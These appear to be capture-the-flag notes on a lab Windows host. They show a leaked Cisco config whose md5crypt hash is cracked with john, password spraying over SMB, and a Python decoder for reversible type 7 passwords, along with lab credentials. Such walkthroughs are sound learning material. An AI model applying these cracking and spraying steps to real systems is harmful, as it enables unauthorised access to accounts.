## Service Enumeration

### SMB

No love

### WAPP

Microsoft IIS httpd 10.0

- seems to not like being spammed with requests (gobuster enumeration)
- does not appear to be running a known WAPP
- can login as guest??

![[Pasted image 20250306152626.png]]

- http://10.10.10.149/attachments/config.txt
    - appears to be a Cisco server config
    - https://www.cisco.com/c/dam/en/us/td/docs/solutions/Enterprise/Data_Center/VXI/configuration/3560-Branch-configuration.pdf

```
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
```

## Initial Access

Cracking the type 5 (md5crypt) `enable secret` hash found in the config file:

```
╭─[λ]-[/targets/heist]-[10.10.10.149]
╰─> john ./cisco_router.hash --wordlist=/arsenal/resources/rockyou.txt
Loaded 1 password hash (md5crypt [MD5 32/64 X2])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
stealth1agent (?)
```

Password: `stealth1agent`

```
╭─[λ]-[/targets/heist]-[10.10.10.149]
╰─> cat users.txt
rout3r
admin
Hazard
```

Spraying that password against SMB with this user list yields a hit for `Hazard:stealth1agent`. Performing some [[RID Brute]] magic reveals a couple of new users. Another password spray yields a pwn for `Chase:Q4)sJu\Y8qz*A3?d`, which in turn enables access through WinRM.

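
The two `password 7` strings in config.txt are Cisco type 7 values, a reversible XOR obfuscation rather than a hash, and decoding the `admin` entry gives the password that hit for Chase. The following is an added example, not part of the original notes: a small config auditor (the names `decode_type7` and `audit_config` are hypothetical) that classifies each credential line by storage type and shows which ones are recoverable without any cracking.

```python
import re

# Fixed, publicly documented XOR key behind Cisco IOS "type 7" obfuscation.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"

# Sample input: the credential lines copied from config.txt above.
SAMPLE_CONFIG = r"""
service password-encryption
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

# Matches "enable secret|password <type> <value>" and "username X ... <type> <value>".
CRED_RE = re.compile(
    r"^(?:username (?P<user>\S+) .*?|enable )(?:password|secret) "
    r"(?P<type>\d) (?P<value>\S+)$", re.M)

# How each IOS storage type holds up once the config file leaks.
RISK = {"0": "cleartext", "7": "reversible obfuscation",
        "5": "md5crypt, offline-crackable"}


def decode_type7(encoded: str) -> str:
    """Undo type 7: two decimal digits give the key offset, the rest is hex XOR data."""
    offset = int(encoded[:2])
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]
                 for i, b in enumerate(data)).decode("ascii")


def audit_config(text: str) -> list[dict]:
    """Return one finding per credential line, with the plaintext where recoverable."""
    findings = []
    for m in CRED_RE.finditer(text):
        kind, value = m["type"], m["value"]
        if kind == "7":
            recovered = decode_type7(value)
        elif kind == "0":
            recovered = value
        else:
            recovered = None  # hashed: needs offline guessing, as done with john above
        findings.append({"account": m["user"] or "enable", "type": kind,
                         "risk": RISK.get(kind, "unrecognised type"),
                         "recovered": recovered})
    return findings


if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG):
        print(finding)
```

On IOS releases that support it, `algorithm-type scrypt` with `secret` stores a type 9 hash in place of type 7 or type 5 values.
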
## Privesc

- users
    - Chase (got user folder)
    - Hazard (got user folder)
    - Admin
    - Jason
    - Support
- no SeImpersonate
- no systeminfo (access denied)
- tasklist (access denied)
- `netsh firewall show config` mentions firefox